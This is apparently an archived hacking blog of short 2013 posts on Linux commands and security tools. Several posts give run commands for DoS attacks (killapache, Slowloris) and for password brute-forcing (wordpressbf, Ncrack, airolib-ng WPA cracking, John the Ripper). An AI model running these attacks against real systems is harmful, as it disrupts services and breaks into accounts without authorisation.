-M : Add a column of security data
s : Display signal format
u : Display user-oriented format
v : Display virtual memory format
X : Register format
--columns n : Set screen width
--lines n : Set screen height
--cumulative : Include some dead child process data
e : Show the environment after the command
f : ASCII art process hierarchy
h : No header
-H : Show process hierarchy
--headers : Repeat header lines
-n namelist : Set namelist file
Examples :
ps -e : see every process
ps -ef : see every processes with full format listing
ps -U hackforlulz : see every processes running as hackforlulz user (real)
ps -p 666 : see process with pid = 666
ps -p 666 -H : see process with pid = 666 and the hierarchy
For more informations about ps type : man ps
If you have a problem or you need some explanations just write under this post!
Wednesday, March 27, 2013
Dmesg
Dmesg is used to examine or control the kernel ring buffer.
Syntax : dmesg [options]
-C : clear the kernel ring buffer
-c : read and clear all messages
-D : disable printing messages to console
-d : show time delta between printed messages
-e : show local time and time delta in readable format
-E : enable printing messages to console
-F file : use the file instead of the kernel log buffer
-f list : restrict output to defined facilities
-k : display kernel messages
-l list : restrict output to defined levels
-n level : set level of messages printed to console
-r : print the raw message buffer
-S : force to use syslog(2) rather than /dev/kmsg
-s size : buffer size to query the kernel ring buffer
-T : show human readable timestamp
-t : don't print messages timestamp
-u : display userspace messages
-x : decode facility and level to readable string
For more informations type : dmesg -h
If you have a problem or you need some explanations just write under this post!
Syntax : dmesg [options]
-C : clear the kernel ring buffer
-c : read and clear all messages
-D : disable printing messages to console
-d : show time delta between printed messages
-e : show local time and time delta in readable format
-E : enable printing messages to console
-F file : use the file instead of the kernel log buffer
-f list : restrict output to defined facilities
-k : display kernel messages
-l list : restrict output to defined levels
-n level : set level of messages printed to console
-r : print the raw message buffer
-S : force to use syslog(2) rather than /dev/kmsg
-s size : buffer size to query the kernel ring buffer
-T : show human readable timestamp
-t : don't print messages timestamp
-u : display userspace messages
-x : decode facility and level to readable string
For more informations type : dmesg -h
If you have a problem or you need some explanations just write under this post!
Tuesday, March 26, 2013
Wordpress Bruteforce
Wordpressbf is a python tool for login wordpress bruteforce.
You can download wordpressbf from here
Syntax : ./wordpressbf.py site user wordlist [options]
Options :
-p host:port : proxy
-v : verbose mode
ex : ./wordpressbf.py http://wordpress-site/wp-login.php HackForLulz /home/hackforlulz/wordlist
If you have a problem or you need some explanations just write under this post!
You can download wordpressbf from here
Syntax : ./wordpressbf.py site user wordlist [options]
Options :
-p host:port : proxy
-v : verbose mode
ex : ./wordpressbf.py http://wordpress-site/wp-login.php HackForLulz /home/hackforlulz/wordlist
If you have a problem or you need some explanations just write under this post!
Monday, March 25, 2013
Sunday, March 24, 2013
Uname - Linux
Uname is a tools for kernel and system informations.
Syntax : uname [option]
Options:
-a : all informations
-s : kernel name
-n : network node hostname
-r : kernel relase
-v : kernel version
-m : machine hardware name
-p : processor type
-i : hardware platform
-o : operating system
For help : uname --help
If you have a problem or you need some explanations just write under this post!
Syntax : uname [option]
Options:
-a : all informations
-s : kernel name
-n : network node hostname
-r : kernel relase
-v : kernel version
-m : machine hardware name
-p : processor type
-i : hardware platform
-o : operating system
For help : uname --help
If you have a problem or you need some explanations just write under this post!
XMPP (Jabber)
XMPP (Extensible Messaging and Presence Protocol) is a communications protocol for message-oriented middleware based on XML.
The protocol was originally named Jabber.
Jabber.org is the original IM service based on XMPP, an open standard for instant messaging.
Click here to register jabber.org
Download a xmpp client like pidgin.
Accounts/manage account/ADD <- add account on pidgin.
Pidgin support a lot of protocol you must use xmpp.
examples : hackforlulz@jabber.org
Username : hackforlulz
Domain : jabber.org
Pidgin-otr is a plugin for pidgin that allows you to have private conversations over instant messaging by providing:
- No one else can read your instant messages.
- You are assured the correspondent is who you think it is.
The messages you send do not have digital signatures that are checkable by a third party. Anyone can forge messages after a conversation to make them look like they came from you. However, during a conversation, your correspondent is assured the messages he sees are authentic and unmodified.
- If you lose control of your private keys, no previous conversation is compromised.
Add hackforlulz to your account -> hackforlulz@jabber.org
If you have a problem or you need some explanations just write under this post!
The protocol was originally named Jabber.
Jabber.org is the original IM service based on XMPP, an open standard for instant messaging.
Click here to register jabber.org
Download a xmpp client like pidgin.
Accounts/manage account/ADD <- add account on pidgin.
Pidgin support a lot of protocol you must use xmpp.
examples : hackforlulz@jabber.org
Username : hackforlulz
Domain : jabber.org
Pidgin-otr is a plugin for pidgin that allows you to have private conversations over instant messaging by providing:
- No one else can read your instant messages.
- You are assured the correspondent is who you think it is.
The messages you send do not have digital signatures that are checkable by a third party. Anyone can forge messages after a conversation to make them look like they came from you. However, during a conversation, your correspondent is assured the messages he sees are authentic and unmodified.
- If you lose control of your private keys, no previous conversation is compromised.
Add hackforlulz to your account -> hackforlulz@jabber.org
If you have a problem or you need some explanations just write under this post!
Saturday, March 23, 2013
IRC - Internet relay chat
Internet Relay Chat (IRC) is a protocol for live interactive Internet text messaging (chat)
It is mainly designed for group communication in discussion forums, called channels, but also allows one-to-one communication via private message as well as chat and data transfer, including file sharing.
An irc example is : irc.autistici.org/6667 (irc.autustici.org <- address, 6667 <- port).
There are a lot of client like hexchat, irrsi, weechat and others.
There are commands about nickserv, chanserv, botserv, memoserv.
Type :
/msg nickserv help -> more informations about nickserv
/msg chanserv help -> more informations about chanserv
/msg botserv help -> more informations about botserv
/msg memoserv help -> more informations about memoserv
There are a lot of mode for nickserv and chanserv.
/mode + mode -> set mode
/mode - mode -> remove mode
For a list of irc mode use Google. (Remember, Google is your friend, maybe).
/kick -> kick user from a chan
/ban -> ban a nick or host from a chan
Join hack forlulz's irc on irc.autistici.org/6667 chan #HackForLulz or join from webchat here.
If you have a problem or you need some explanations just write under this post!
It is mainly designed for group communication in discussion forums, called channels, but also allows one-to-one communication via private message as well as chat and data transfer, including file sharing.
An irc example is : irc.autistici.org/6667 (irc.autustici.org <- address, 6667 <- port).
There are a lot of client like hexchat, irrsi, weechat and others.
There are commands about nickserv, chanserv, botserv, memoserv.
Type :
/msg nickserv help -> more informations about nickserv
/msg chanserv help -> more informations about chanserv
/msg botserv help -> more informations about botserv
/msg memoserv help -> more informations about memoserv
There are a lot of mode for nickserv and chanserv.
/mode + mode -> set mode
/mode - mode -> remove mode
For a list of irc mode use Google. (Remember, Google is your friend, maybe).
/kick -> kick user from a chan
/ban -> ban a nick or host from a chan
Join hack forlulz's irc on irc.autistici.org/6667 chan #HackForLulz or join from webchat here.
If you have a problem or you need some explanations just write under this post!
Friday, March 22, 2013
Crunch - wordlist generator
Crunch can create a wordlist based on criteria you specify. The outout from crunch can be sent to the screen, file, or to another program.
You can find crunch here
Syntax : crunch min max charset [options] (default charset : abcdefghijklmopqrstuvwxyz)
Options :
-b : maximum bytes to write to output file. depending on the blocksize files may be some bytes smaller than specified but never bigger
-c : numbers of lines to write to output file, only works if "-o START"
-d : specify -d [n][@,%^] to suppress generation of strings with more than [n] adjacent duplicates from the given character set
-f : path to a file containing a list of character sets (example -f charset.lst)
-l : literal characters to use in -t @,%^
-o : allows you to specify the file to write the output to
-p : prints permutations without repeating characters
-r : resume a previous session
-s : allows you to specify the starting string
-t [FIXED]@,%^ : allows you to specify a pattern
Example: crunch 3 4 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234456789 -o /home/hackforlulz/outputfile
Min = 3
Max = 3
Characters = abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234456789
Output = /home/hackforlulz/outputfile
If you have a problem or you need some explanations just write under this post!
You can find crunch here
Syntax : crunch min max charset [options] (default charset : abcdefghijklmopqrstuvwxyz)
Options :
-b : maximum bytes to write to output file. depending on the blocksize files may be some bytes smaller than specified but never bigger
-c : numbers of lines to write to output file, only works if "-o START"
-d : specify -d [n][@,%^] to suppress generation of strings with more than [n] adjacent duplicates from the given character set
-f : path to a file containing a list of character sets (example -f charset.lst)
-l : literal characters to use in -t @,%^
-o : allows you to specify the file to write the output to
-p : prints permutations without repeating characters
-r : resume a previous session
-s : allows you to specify the starting string
-t [FIXED]@,%^ : allows you to specify a pattern
Example: crunch 3 4 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234456789 -o /home/hackforlulz/outputfile
Min = 3
Max = 3
Characters = abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234456789
Output = /home/hackforlulz/outputfile
If you have a problem or you need some explanations just write under this post!
Wednesday, March 20, 2013
Guide to Python [ITA]
Tuesday, March 19, 2013
OpenVpn
OpenVPN is an open source software application that implements virtual private network (VPN) techniques for creating secure point-to-point or site-to-site connections in routed or bridged configurations and remote access facilities.
It uses a custom security protocol that utilizes SSL/TLS for key exchange. It is capable of traversing network address translators (NATs) and firewalls.
It was written by James Yonan and is published under the GNU General Public License (GPL).
OpenVPN uses the OpenSSL library to provide encryption of both the data and control channels.
It lets OpenSSL do all the encryption and authentication work, allowing OpenVPN to use all the ciphers available in the OpenSSL package.
It can also use the HMAC packet authentication feature to add an additional layer of security to the connection (referred to as an "HMAC Firewall" by the creator).
It can also use hardware acceleration to get better encryption performance.
You can find openvpn here
You can create a VPN with openvpn by network manager.
To start OpenVpn type : openvpn --config file.conf
For more information about OpenVpn type : openvpn --help
If you have a problem or you need some explanations just write under this post!
It uses a custom security protocol that utilizes SSL/TLS for key exchange. It is capable of traversing network address translators (NATs) and firewalls.
It was written by James Yonan and is published under the GNU General Public License (GPL).
OpenVPN uses the OpenSSL library to provide encryption of both the data and control channels.
It lets OpenSSL do all the encryption and authentication work, allowing OpenVPN to use all the ciphers available in the OpenSSL package.
It can also use the HMAC packet authentication feature to add an additional layer of security to the connection (referred to as an "HMAC Firewall" by the creator).
It can also use hardware acceleration to get better encryption performance.
You can find openvpn here
You can create a VPN with openvpn by network manager.
To start OpenVpn type : openvpn --config file.conf
For more information about OpenVpn type : openvpn --help
If you have a problem or you need some explanations just write under this post!
Sunday, March 17, 2013
youtube-viewer
Youtube-viewer is a command line utility for viewing youtube-videos in MPlayer (so you must have MPlayer on your system).
You can find youtube-viewer here
Type youtube-viewer to start the program.
Now you can search the videos that you want see.
:login : will prompt you for login
:logout : will delete the authentication key
:q : quit
:course=ID : list lectures from a courseID
:courses=ID : list courses of lectures from a categoryID
:playlist=ID : list videos from a playlistID
For more informations type :h after start youtube-viewer or type youtube-viewer -h
If you have a problem or you need some explanations just write under this post!
You can find youtube-viewer here
Type youtube-viewer to start the program.
Now you can search the videos that you want see.
:login : will prompt you for login
:logout : will delete the authentication key
:q : quit
:course=ID : list lectures from a courseID
:courses=ID : list courses of lectures from a categoryID
:playlist=ID : list videos from a playlistID
For more informations type :h after start youtube-viewer or type youtube-viewer -h
If you have a problem or you need some explanations just write under this post!
Saturday, March 16, 2013
Airolib - Aircrack-ng
Airolib-ng is an aircrack-ng suite tool designed to store and manage essid and password lists, compute their Pairwise Master Keys (PMKs) and use them in WPA/WPA2 cracking.
The program uses the lightweight SQLite3 database as the storage mechanism which is available on most platforms.
WPA/WPA2 cracking involves calculating the pairwise master key, from which the private transient key (PTK) is derived.
First of all we must create a database.
Create file (for example plot.txt) with a list of password (you can find on google a lo of txt dictionary).
Create a file (for example essid.txt) with essid of wirless network you want crack.
DB is the database we want create.
airolib-ng DB --import essid essid.txt
airloin-ng DB --import passwd plot.txt
Now you can clean invalide key with command :
airloib-ng DB --clean all Now you can start to calculate PKM :
airolib-ng DB --batch Syntax : airolib-ng database operation [options]
Operations :
--stats : Output information about the database.
--sql sql : Execute specified SQL statement.
--clean [all] : Clean the database from old junk. 'all' will also reduce filesize if possible and run an integrity check.
--batch : Start batch-processing all combinations of ESSIDs and passwords.
--verify [all] : Verify a set of randomly chosen PMKs. If 'all' is given, all invalid PMK will be deleted.
--import [essid|passwd] file : Import a text file as a list of ESSIDs or passwords.
For more informations type airolib-ng or click here
If you have a problem or you need some explanations just write under this post!
The program uses the lightweight SQLite3 database as the storage mechanism which is available on most platforms.
WPA/WPA2 cracking involves calculating the pairwise master key, from which the private transient key (PTK) is derived.
First of all we must create a database.
Create file (for example plot.txt) with a list of password (you can find on google a lo of txt dictionary).
Create a file (for example essid.txt) with essid of wirless network you want crack.
DB is the database we want create.
airolib-ng DB --import essid essid.txt
airloin-ng DB --import passwd plot.txt
Now you can clean invalide key with command :
airloib-ng DB --clean all Now you can start to calculate PKM :
airolib-ng DB --batch Syntax : airolib-ng database operation [options]
Operations :
--stats : Output information about the database.
--sql sql : Execute specified SQL statement.
--clean [all] : Clean the database from old junk. 'all' will also reduce filesize if possible and run an integrity check.
--batch : Start batch-processing all combinations of ESSIDs and passwords.
--verify [all] : Verify a set of randomly chosen PMKs. If 'all' is given, all invalid PMK will be deleted.
--import [essid|passwd] file : Import a text file as a list of ESSIDs or passwords.
For more informations type airolib-ng or click here
If you have a problem or you need some explanations just write under this post!
Friday, March 15, 2013
Monday, March 11, 2013
Lynx - Text browser
Lynx is a text browser for the World Wide Web.
Lynx 2.8.7 runs on Un*x, MacOS, VMS, Windows 95/98/NT.
You can find the lastest version of lynx here
After start lynx you can:
? or h : help
o : options
p : print (save to a local file, mail the file, print to the screen, print out on a printer
m : main screen
g : go
q : quit
If you have a problem or you need some explanations just write under this post!
Lynx 2.8.7 runs on Un*x, MacOS, VMS, Windows 95/98/NT.
You can find the lastest version of lynx here
After start lynx you can:
? or h : help
o : options
p : print (save to a local file, mail the file, print to the screen, print out on a printer
m : main screen
g : go
q : quit
If you have a problem or you need some explanations just write under this post!
Friday, March 8, 2013
ritX - Reverse IP Lookup Tool
RitX is a Reverse IP Lookup Tool that will allows you to use an IP address or domain name to identify all currently domains hosted on a server using multiple services and various techniques.
This is the list of services that RitX support:
-Ewhois.com
-Pagesinventory.com
-Viewdns.info
-Yougetsignal.com
-Myiptest.com
-Ip-adress.com
-DNStrails.com
-My-ip-neighbors.com
-Domainsbyip.com
-Bing.com
-Whois.WebHosting.info
-Robtex.com
-Tools.web-max.ca
-Sameip.org
Ritx is written in perl, you can find ritx here
Sytax : perl RitX.pl [OPTIONS]
Options :
-t target: Server hostname or IP
-c : Check extracted domains that are in the same IP address to eleminate cached/old records
-o file: Save results to a file (default IP.txt)
--threads=thread: Maximum number of concurrent IP checks (default 1)
ex : perl ritx.pl -t www.site.com -o /home/hackforlulz/output --threads=5
If you have a problem or you need some explanations just write under this post!
This is the list of services that RitX support:
-Ewhois.com
-Pagesinventory.com
-Viewdns.info
-Yougetsignal.com
-Myiptest.com
-Ip-adress.com
-DNStrails.com
-My-ip-neighbors.com
-Domainsbyip.com
-Bing.com
-Whois.WebHosting.info
-Robtex.com
-Tools.web-max.ca
-Sameip.org
Ritx is written in perl, you can find ritx here
Sytax : perl RitX.pl [OPTIONS]
Options :
-t target: Server hostname or IP
-c : Check extracted domains that are in the same IP address to eleminate cached/old records
-o file: Save results to a file (default IP.txt)
--threads=thread: Maximum number of concurrent IP checks (default 1)
ex : perl ritx.pl -t www.site.com -o /home/hackforlulz/output --threads=5
If you have a problem or you need some explanations just write under this post!
Wednesday, March 6, 2013
Torchat - Instant messenger
TorChat is a peer to peer instant messenger written in python with a completely decentralized design, built on top of Tor's location hidden services, giving you extremely strong anonymity while being very easy to use without the need to install or configure anything.
All TorChat traffic is encrypted end-to-end.
You can find torchat here
For run type : python torchat.py
Torchat need python 2.x and doesn't work with python 3.x
If you have a problem or you need some explanations just write under this post!
All TorChat traffic is encrypted end-to-end.
You can find torchat here
For run type : python torchat.py
Torchat need python 2.x and doesn't work with python 3.x
If you have a problem or you need some explanations just write under this post!
Tuesday, March 5, 2013
John The Ripper - Password cracker
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS.
It's primary purpose is to detect weak Unix passwords.
Besides several crypt(3) password hash types most commonly found on various Unix systems, supported out of the box are Windows LM hashes, plus lots of other hashes and ciphers in the community-enhanced version.
You can download john the ripper from here
Syntax : john [options] [password-files]
--config=FILE : use FILE instead of john.conf
--wordlist[=FILE] --stdin wordlist mode, read words from FILE or stdin
--pipe like --stdin, but bulk reads, and allows rules
--encoding=NAME : input data is non-ascii (eg. UTF-8, ISO-8859-1). For a full list of NAME use --list=encodings
--rules[=SECTION] : enable word mangling rules for wordlist modes
--stdout[=LENGTH] : just output candidate passwords (cut at LENGTH)
--make-charset=FILE : make a charset file. It will be overwritten
--show[=LEFT] : show cracked passwords (if =LEFT, then uncracked)
--test[=TIME] : run tests and benchmarks for TIME seconds each
--users=[-]LOGIN|UID[,..] [do not] load this (these) user(s) only
--format=NAME : force hash type NAME: afs bf bfegg bsdi crc32 crypt des django dmd5 dominosec dragonfly3-32 dragonfly3-64 dragonfly4-32 dragonfly4-64 drupal7 dummy dynamic_n epi episerver gost hdaa hmac-md5 hmac-sha1 hmac-sha224 hmac-sha256 hmac-sha384 hmac-sha512 hmailserver ipb2 keepass keychain krb4 krb5 lm lotus5 md4-gen md5 md5ns mediawiki mscash mscash2 mschapv2 mskrb5 mssql mssql05 mysql mysql-sha1 nethalflm netlm netlmv2 netntlm netntlmv2 nsldap nt nt2 odf office oracle oracle11 osc pdf phpass phps pix-md5 pkzip po pwsafe racf rar raw-md4 raw-md5 raw-md5u raw-sha raw-sha1 raw-sha1-linkedin raw-sha1-ng raw-sha224 raw-sha256 raw-sha384 raw-sha512 salted-sha1 sapb sapg sha1-gen sha256crypt sha512crypt sip ssh sybasease trip vnc wbb3 wpapsk xsha xsha512 zip
--save-memory=LEVEL : enable memory saving, at LEVEL 1..3
--nolog : disables creation and writing to john.log file
--max-run-time=N : gracefully exit after this many seconds
--plugin=NAME[,..] : load this (these) dynamic plugin(s)
For more information type : john
If you have a problem or you need some explanations just write under this post!
It's primary purpose is to detect weak Unix passwords.
Besides several crypt(3) password hash types most commonly found on various Unix systems, supported out of the box are Windows LM hashes, plus lots of other hashes and ciphers in the community-enhanced version.
You can download john the ripper from here
Syntax : john [options] [password-files]
--config=FILE : use FILE instead of john.conf
--wordlist[=FILE] --stdin wordlist mode, read words from FILE or stdin
--pipe like --stdin, but bulk reads, and allows rules
--encoding=NAME : input data is non-ascii (eg. UTF-8, ISO-8859-1). For a full list of NAME use --list=encodings
--rules[=SECTION] : enable word mangling rules for wordlist modes
--stdout[=LENGTH] : just output candidate passwords (cut at LENGTH)
--make-charset=FILE : make a charset file. It will be overwritten
--show[=LEFT] : show cracked passwords (if =LEFT, then uncracked)
--test[=TIME] : run tests and benchmarks for TIME seconds each
--users=[-]LOGIN|UID[,..] [do not] load this (these) user(s) only
--format=NAME : force hash type NAME: afs bf bfegg bsdi crc32 crypt des django dmd5 dominosec dragonfly3-32 dragonfly3-64 dragonfly4-32 dragonfly4-64 drupal7 dummy dynamic_n epi episerver gost hdaa hmac-md5 hmac-sha1 hmac-sha224 hmac-sha256 hmac-sha384 hmac-sha512 hmailserver ipb2 keepass keychain krb4 krb5 lm lotus5 md4-gen md5 md5ns mediawiki mscash mscash2 mschapv2 mskrb5 mssql mssql05 mysql mysql-sha1 nethalflm netlm netlmv2 netntlm netntlmv2 nsldap nt nt2 odf office oracle oracle11 osc pdf phpass phps pix-md5 pkzip po pwsafe racf rar raw-md4 raw-md5 raw-md5u raw-sha raw-sha1 raw-sha1-linkedin raw-sha1-ng raw-sha224 raw-sha256 raw-sha384 raw-sha512 salted-sha1 sapb sapg sha1-gen sha256crypt sha512crypt sip ssh sybasease trip vnc wbb3 wpapsk xsha xsha512 zip
--save-memory=LEVEL : enable memory saving, at LEVEL 1..3
--nolog : disables creation and writing to john.log file
--max-run-time=N : gracefully exit after this many seconds
--plugin=NAME[,..] : load this (these) dynamic plugin(s)
For more information type : john
If you have a problem or you need some explanations just write under this post!
Monday, March 4, 2013
SQID - Sql injection digger
SQL injection digger is a cscript, written in runy, that looks for SQL injections and common errors in web sites.
Current version can perform the following operations:
-Look for SQL injections and common errors in web site URLs found by performing a google search.
-Look for SQL injections and common errors in a given URL or a file with URLs.
-Look for SQL injections and common errors in links from a web page.
-Crawl a web site/web page and do the above.
Syntax : ./sqid.rb [options]
-u site: check this URL
-p site: Check this page.
-c site: Crawl website WEBSITE and check. Specfify as http[s]://WESITE:[PORT] (port default =80)
-a: Accept cookies from the webite or page (default = no)
-R: Set referer in the HTTP header.
-B: Use crendtials as basic auth for the website. Specfify as user:password.
-t: Use TRIGGER for detecting SQL injections/errors (default = ')
-T seconds: Timeout for response in seconds. (default = 10)
-U: User Agent in the HTTP Header. Default is SQID/0.3.
-P: User HTTP proxy PROXY for operations. (proxy:port)
-A: Use crendtials CRENDENTIALS for the proxy.Specfify as user:password.
-v: Run verbosely
Exampe:
./sqid.rb -u "www.site.com/home.php?id=5 If you have a problem or you need some explanations just write under this post!
Current version can perform the following operations:
-Look for SQL injections and common errors in web site URLs found by performing a google search.
-Look for SQL injections and common errors in a given URL or a file with URLs.
-Look for SQL injections and common errors in links from a web page.
-Crawl a web site/web page and do the above.
Syntax : ./sqid.rb [options]
-u site: check this URL
-p site: Check this page.
-c site: Crawl website WEBSITE and check. Specfify as http[s]://WESITE:[PORT] (port default =80)
-a: Accept cookies from the webite or page (default = no)
-R: Set referer in the HTTP header.
-B: Use crendtials as basic auth for the website. Specfify as user:password.
-t: Use TRIGGER for detecting SQL injections/errors (default = ')
-T seconds: Timeout for response in seconds. (default = 10)
-U: User Agent in the HTTP Header. Default is SQID/0.3.
-P: User HTTP proxy PROXY for operations. (proxy:port)
-A: Use crendtials CRENDENTIALS for the proxy.Specfify as user:password.
-v: Run verbosely
Exampe:
./sqid.rb -u "www.site.com/home.php?id=5 If you have a problem or you need some explanations just write under this post!
Friday, March 1, 2013
Killapache
Killapache is a perl script for apache exploitation.
You can find killapache.pl here.
It sends multiple GET requests with dozens of “Byte Ranges” that will eat up server’s memory. Byte Range helps browswer or downloading applications to download required parts of file. This helps reduce bandwidth usage.
While this script sends dozen of unsorted components in request header to cause apache server to malfunction.
It works on Linux. We need perl (in more distro is pre-installed).
Now we open synaptic and install : libyaml-perl , libyaml-libyaml-perl and libparallel-forkmanager-perl
For start the script : perl killapache.pl www.sito.it forks
For number of forks i reccomend to use 50 forks
If you have a problem or you need some explanations just write under this post!
You can find killapache.pl here.
It sends multiple GET requests with dozens of “Byte Ranges” that will eat up server’s memory. Byte Range helps browswer or downloading applications to download required parts of file. This helps reduce bandwidth usage.
While this script sends dozen of unsorted components in request header to cause apache server to malfunction.
It works on Linux. We need perl (in more distro is pre-installed).
Now we open synaptic and install : libyaml-perl , libyaml-libyaml-perl and libparallel-forkmanager-perl
For start the script : perl killapache.pl www.sito.it forks
For number of forks i reccomend to use 50 forks
If you have a problem or you need some explanations just write under this post!
Thursday, February 28, 2013
Slowloris - DoS
Slowloris is a perl script for dos attack. Slowloris is different from the old programs for ddos because he doesn't work on tcp or icmp connections, but he works on http protocol.
You can download Slowloris from here.
Slowloris needs perl to run; perl is pre-installed on linux and osx system. You can download perl from here, perl is avaible for all system.
Fistable:
perl slowloris.pl -dns example.com -port 80 -test
This tests the server to see what it’s timeout window is.
After the test:
perl slowloris.pl -dns example.com -port 80 -timeout timeout test -num 500 -tcpto 5.
If you have a problem or you need some explanations just write under this post!
You can download Slowloris from here.
Slowloris needs perl to run; perl is pre-installed on linux and osx system. You can download perl from here, perl is avaible for all system.
Fistable:
perl slowloris.pl -dns example.com -port 80 -test
This tests the server to see what it’s timeout window is.
After the test:
perl slowloris.pl -dns example.com -port 80 -timeout timeout test -num 500 -tcpto 5.
If you have a problem or you need some explanations just write under this post!
Pyloris
PyLoris is a scriptable tool for testing a service's level of vulnerability to a particular class of Denial of Service (DoS) attack.
Any service that places restrictions on the total number of simultaneous TCP connections has the potential for vulnerability to PyLoris.
Additionally, services that handle connections in independent threads, services that poorly manage concurrent connections, and services that have high memory footprint per connection are prone to this form of vulnerability.
You can download pyloris from here.
PyLoris 3.0 requires Python 2.x to run.
For launch pyloris you can use idle python, or terminal:
python pyloris.py
You can use pyloris with tor and choose between HTTP, SOCKS4 and SOCKS5 proxy.
Pyloris is avaible for all platform.
If you have a problem or you need some explanations just write under this post!
Any service that places restrictions on the total number of simultaneous TCP connections has the potential for vulnerability to PyLoris.
Additionally, services that handle connections in independent threads, services that poorly manage concurrent connections, and services that have high memory footprint per connection are prone to this form of vulnerability.
You can download pyloris from here.
PyLoris 3.0 requires Python 2.x to run.
For launch pyloris you can use idle python, or terminal:
python pyloris.py
You can use pyloris with tor and choose between HTTP, SOCKS4 and SOCKS5 proxy.
Pyloris is avaible for all platform.
If you have a problem or you need some explanations just write under this post!
Wednesday, February 27, 2013
xssscan - Cross site scripting scan
XSSscan is a cross site scripting scanner written in python that can take output from google or can search one site.
You can find xssscan here
Syntax : xssscan.py options
Options :
-g/-google : Searches google for hosts
-s/-site : Searches just that site, (default port 80)
-a/-alert : Change the alert pop-up message
-w/-write : Writes potential XSS found to file
-v/-verbose : Verbose Mode
If you have a problem or you need some explanations just write under this post!
You can find xssscan here
Syntax : xssscan.py options
Options :
-g/-google
-s/-site
-a/-alert
-w/-write
-v/-verbose : Verbose Mode
If you have a problem or you need some explanations just write under this post!
Tuesday, February 26, 2013
Ncrack - Network authentication cracking tool
Ncrack is a high-speed network authentication cracking tool.
It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords.
Security professionals also rely on Ncrack when auditing their clients. Ncrack was designed using a modular approach, a command-line syntax similar to Nmap and a dynamic engine that can adapt its behaviour based on network feedback.
It allows for rapid, yet reliable large-scale auditing of multiple hosts.
Ncrack's features include a very flexible interface granting the user full control of network operations, allowing for very sophisticated bruteforcing attacks, timing templates for ease of use, runtime interaction similar to Nmap's and many more.
Protocols supported include RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, and telnet.
You can donwload ncrack from here
Syntax : ncrack [options] [target and specification]
For target you can pass hostname, IP ecc..
-iL inputfile : Input from list of hosts/networks
-p : services will be applied to all non-standard notation hosts
-m : options will be applied to all services of this type
-g : options will be applied to every service globally
ssl : enable SSL
path name: used in modules like HTTP ('=' needs escaping if used)
-U filename: username file
-P filename: password file
-oN/-oX file: Output scan in normal and XML format, respectively, to the given filename.
-f: quit cracking service after one found credential
-6: Enable IPv6 cracking
For more informations type : ncrack -h
If you have a problem or you need some explanations just write under this post!
It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords.
Security professionals also rely on Ncrack when auditing their clients. Ncrack was designed using a modular approach, a command-line syntax similar to Nmap and a dynamic engine that can adapt its behaviour based on network feedback.
It allows for rapid, yet reliable large-scale auditing of multiple hosts.
Ncrack's features include a very flexible interface granting the user full control of network operations, allowing for very sophisticated bruteforcing attacks, timing templates for ease of use, runtime interaction similar to Nmap's and many more.
Protocols supported include RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, and telnet.
You can donwload ncrack from here
Syntax : ncrack [options] [target and specification]
For target you can pass hostname, IP ecc..
-iL inputfile : Input from list of hosts/networks
-p : services will be applied to all non-standard notation hosts
-m : options will be applied to all services of this type
-g : options will be applied to every service globally
ssl : enable SSL
path name: used in modules like HTTP ('=' needs escaping if used)
-U filename: username file
-P filename: password file
-oN/-oX file: Output scan in normal and XML format, respectively, to the given filename.
-f: quit cracking service after one found credential
-6: Enable IPv6 cracking
For more informations type : ncrack -h
If you have a problem or you need some explanations just write under this post!
Monday, February 25, 2013
Nikto - Web server scanner
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6500 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers.
It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software.
Scan items and plugins are frequently updated and can be automatically updated.
You can find nikto here
Synstax : nikto options
Options:
-host : target host
-id : host authentication to use, format is id:pass or id:pass:realm
-maxtime : Maximum testing time per host
-mutate : Guess additional file names:
1 : Test all files with all root directories
2 : Guess for password file names
3 : Enumerate user names via Apache (/~user type requests)
4 : Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests)
5 : Attempt to brute force sub-domain names, assume that the host name is the parent domain
6 : Attempt to guess directory names from the supplied dictionary file
-nointeractive : Disables interactive features
-nolookup : Disables DNS lookups
-nossl : Disables the use of SSL
-no404 : Disables nikto attempting to guess a 404 page
-output path : Write output to this file ('.' for auto-name)
-port : Port to use (default 80)
-ssl : Force ssl mode on port
-Tuning : Scan tuning :
1 : Interesting File / Seen in logs
2 : Misconfiguration / Default File
3 : Information Disclosure
4 : Injection (XSS/Script/HTML)
5 : Remote File Retrieval - Inside Web Root
6 : DoS 7 : Remote File Retrieval - Server Wide
8 : Command Execution / Remote Shell
9 : SQL Injection
0 : File upload
a : Authentication Bypass
b : Software Identification
c : Remote Source Inclusion
x : Reverse Tuning Options (i.e., include all except specified)
-timeout : Timeout for requests (default 10s)
-useproxy : Use the proxy defined in nikto.conf
Example :
nikto -host www.site.com -maxtime 600 -port 80 -nossl -output /home/HackForLulz/result
Target : site.com
Max time scan : 600
Port : 80
ssl : No
Output : /home/HackForLulz/result
nikto -host www.site.com -maxtime 1200 -port 80 -ssl -Tuning 9 -output /home/HackForLulz/result
Target : www.site.com
Max time scan : 1200
Port : 80
ssl : Yes
Scan tuning : SQL Injection (9)
Output : /home/HackForLulz/result
nikto -host www.site.com -port 443 -ssl -Tuning 129 -output /home/HackForLulz/result
Target : www.site.com
port : 443
ssl : Yes
Tuning : 1 (Interesting File) 2(Misconfiguration / Default File) 9(SQL Injection)
Output : /home/HackForLulz/result
For more information about nikto type : nikto -H
If you have a problem or you need some explanations just write under this post!
It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software.
Scan items and plugins are frequently updated and can be automatically updated.
You can find nikto here
Synstax : nikto options
Options:
-host : target host
-id : host authentication to use, format is id:pass or id:pass:realm
-maxtime : Maximum testing time per host
-mutate : Guess additional file names:
1 : Test all files with all root directories
2 : Guess for password file names
